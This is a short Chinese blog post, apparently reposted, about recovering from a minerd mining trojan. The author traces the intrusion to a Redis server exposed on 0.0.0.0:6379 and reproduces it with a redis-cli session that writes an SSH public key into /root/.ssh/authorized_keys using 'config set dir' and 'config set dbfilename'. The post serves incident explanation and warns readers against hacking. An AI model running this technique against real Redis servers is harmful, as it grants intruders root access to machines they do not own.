minerd木马攻击处理
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了minerd木马攻击处理相关的知识,希望对你有一定的参考价值。
杀毒算完成了,可是他是怎么进来的呢。。。因为是我刚安装的系统,就只装了个redis和rabbitmq 其他应用都没有呢
我发现我的redis的 bind 0.0.0.0:6379
默认的。。。。应该是这边进来的。我自己做了下尝试。。。
127.0.0.1:6379> set aa "公钥"OK127.0.0.1:6379> config set dir /root/.ssh/OK127.0.0.1:6379> config set dbfilename "authorized_keys"OK127.0.0.1:6379> savessh-rsa AAAAB3NzaC1yc2EAAAABdadasdAAQEAvPgr/WFKd9h/3e2ik6BmLj4OIdnBNJelaNCOAWwdKQx0WjDtFjN/BvO3vkg4awwYwp3K+UyAGob438pZnqNR37d1RrU7OzBolJ9NnTLPF03gI2aZpfW439T167bxHmKWYzN5vexTNv2orKWaQxMJtjN3xAwzpxiugaiguoleTTxBKG9TFjjBDblLYAoaVdylRLQLUwfCJ/WK50rK++hawBS15t6r9/zTuMD5TCsAJNEN88cPDOuEcnNwtLydtftH1BX3tPISSHtS4VwTr/LdAz40O9lKTTeU/JDHSIIRr95u2Y6/mhaLJwwLp/AFUB/NtF3HOIY75yG/F5k0q1fCaw== [email protected]夭寿拉。妈蛋的竟然真的这样可以吧自己的公钥刷进来。。。
奉劝大家不要黑别人的服务器,运维何苦为难运维。。。
通过这个网站可以查到开放的数据,就不给大家公开了,我得数据可能就是在这里被获取的。
黑客攻击事件到此完了
本文出自 “aolens·程超” 博客,请务必保留此出处http://aolens.blog.51cto.com/7021142/1865994
以上是关于minerd木马攻击处理的主要内容,如果未能解决你的问题,请参考以下文章